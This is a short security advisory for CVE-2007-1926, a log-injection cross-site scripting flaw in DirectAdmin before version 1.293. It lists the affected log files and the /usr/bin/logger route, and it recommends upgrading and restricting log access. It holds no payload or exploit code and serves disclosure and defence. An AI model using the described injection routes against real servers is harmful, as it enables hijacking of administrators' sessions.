CVE-2007-1926

Name of the Vulnerable Software and Affected Versions DirectAdmin versions prior to 1.293

Description The issue allows remote authenticated users to inject arbitrary web script or HTML via http or ftp requests logged in various log files, including /var/log/directadmin/security.log. It also enables context-dependent attackers to inject arbitrary web script or HTML into /var/log/messages via a PHP script that invokes /usr/bin/logger. Additionally, local users can inject arbitrary web script or HTML into /var/log/messages by invoking /usr/bin/logger at the command line. Remote attackers can also inject arbitrary web script or HTML via remote requests logged in several log files, including /var/log/exim/rejectlog, /var/log/exim/mainlog, /var/log/proftpd/auth.log, /var/log/httpd/error log, /var/log/httpd/access log, /var/log/directadmin/error.log, and /var/log/directadmin/security.log.

Recommendations For versions prior to 1.293, update to version 1.293 or later to resolve the issue. As a temporary workaround, consider restricting access to the log files and disabling the invocation of /usr/bin/logger from PHP scripts and command lines to minimize the risk of exploitation. Avoid using the logger command to log user-input data until the issue is resolved.